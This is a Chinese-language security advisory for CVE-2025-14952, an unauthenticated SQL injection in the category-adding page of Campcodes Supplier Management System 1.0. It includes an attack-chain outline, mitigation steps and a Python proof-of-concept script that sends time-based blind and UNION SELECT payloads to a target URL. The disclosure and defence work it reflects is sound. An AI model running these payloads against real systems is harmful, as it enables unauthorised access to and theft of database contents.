CVE-2025-14952 Campcodes供应商管理系统SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-14952

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Campcodes Supplier Management System 1.0

漏洞概述

CVE-2025-14952是Campcodes Supplier Management System 1.0版本中存在的高危SQL注入漏洞。该漏洞位于管理后台的分类添加功能文件/admin/add_category.php中，攻击者可通过txtCategoryName参数注入恶意SQL语句。由于漏洞可被远程利用且无需认证，攻击者无需获取任何用户凭据即可发起攻击。成功利用此漏洞可能导致数据库敏感信息泄露，包括用户账户、密码哈希、业务数据等；进一步可能利用UNION SELECT等技术在特定数据库配置下读取服务器文件系统内容或执行系统命令。此漏洞已被公开披露并标记为可利用状态，建议受影响用户尽快采取修复措施。

技术细节

该SQL注入漏洞存在于Campcodes Supplier Management System 1.0的/admin/add_category.php文件中的分类添加功能。漏洞根源在于程序对用户输入的txtCategoryName参数未进行充分的输入验证和SQL语句预编译处理。攻击者可通过构造特殊的SQL payloads绕过前端限制，直接向服务器发送恶意SQL语句。在未使用参数化查询的情况下，攻击者可利用UNION SELECT语句获取数据库版本、当前数据库名称、用户表结构等敏感信息；利用BENCHMARK或SLEEP函数进行基于时间的盲注测试；或使用LOAD_FILE函数尝试读取服务器本地文件。由于漏洞存在于管理后台接口，攻击者可直接访问/admin/add_category.php进行攻击，无需任何身份认证。CVSS 3.1评分7.3主要因为其网络可达性、无认证利用特性以及对机密性、完整性和可用性的低至中度影响。

攻击链分析

STEP 1

步骤1

攻击者访问目标网站的/admin/add_category.php管理后台页面

STEP 2

步骤2

构造包含SQL注入载荷的HTTP POST请求，将恶意SQL语句注入到txtCategoryName参数

STEP 3

步骤3

服务器端程序直接将用户输入拼接到SQL查询语句中，未使用参数化查询或输入过滤

STEP 4

步骤4

恶意SQL语句在数据库中执行，攻击者可通过UNION注入获取数据库敏感信息或通过盲注提取数据

STEP 5

步骤5

攻击者获取数据库内容后可进一步横向移动，可能读取服务器文件或执行系统命令

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-14952 PoC - Campcodes Supplier Management System SQL Injection
# Target: /admin/add_category.php via txtCategoryName parameter

target_url = sys.argv[1] if len(sys.argv) > 1 else "http://target.com/admin/add_category.php"

# SQL Injection payload - Time-based blind injection
# Test if parameter is vulnerable by checking response time
payloads = [
    "test' AND (SELECT 1 FROM (SELECT SLEEP(5))x)-- -",
    "test' UNION SELECT NULL,version(),NULL,NULL-- -",
    "test' UNION SELECT NULL,database(),NULL,NULL-- -",
    "test' UNION SELECT NULL,user(),NULL,NULL-- -"
]

headers = {
    "Content-Type": "application/x-www-form-urlencoded",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
}

print(f"[*] Testing CVE-2025-14952 SQL Injection on {target_url}")
print(f"[*] Target parameter: txtCategoryName")

for i, payload in enumerate(payloads, 1):
    print(f"\n[+] Test {i}: {payload}")
    data = {
        "txtCategoryName": payload,
        "btnSubmit": "Add Category"
    }
    try:
        response = requests.post(target_url, data=data, headers=headers, timeout=30)
        print(f"[+] Status Code: {response.status_code}")
        print(f"[+] Response Length: {len(response.text)}")
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")

print("\n[*] Note: Modify target URL and payloads based on testing requirements")

影响范围

Campcodes Supplier Management System 1.0

防御指南

临时缓解措施

在正式补丁发布前，可采取以下临时缓解措施：1) 使用Web应用防火墙规则阻断针对add_category.php的异常请求；2) 对/admin路径实施访问控制，要求IP地址白名单或VPN访问；3) 临时禁用分类添加功能；4) 启用数据库操作日志审计，监控可疑SQL执行行为；5) 在应用层添加SQL注入特征检测中间件。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-14952
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-14952
3 Details https://www.cvedetails.com/cve/CVE-2025-14952/
4 VulDB https://vuldb.com/cve/CVE-2025-14952
5 Link https://github.com/vivibiubiu/CVE/issues/1
6 Link https://vuldb.com/?ctiid.337588
7 Link https://vuldb.com/?id.337588
8 Link https://vuldb.com/?submit.716440
9 Link https://www.campcodes.com/
10 Link https://github.com/vivibiubiu/CVE/issues/1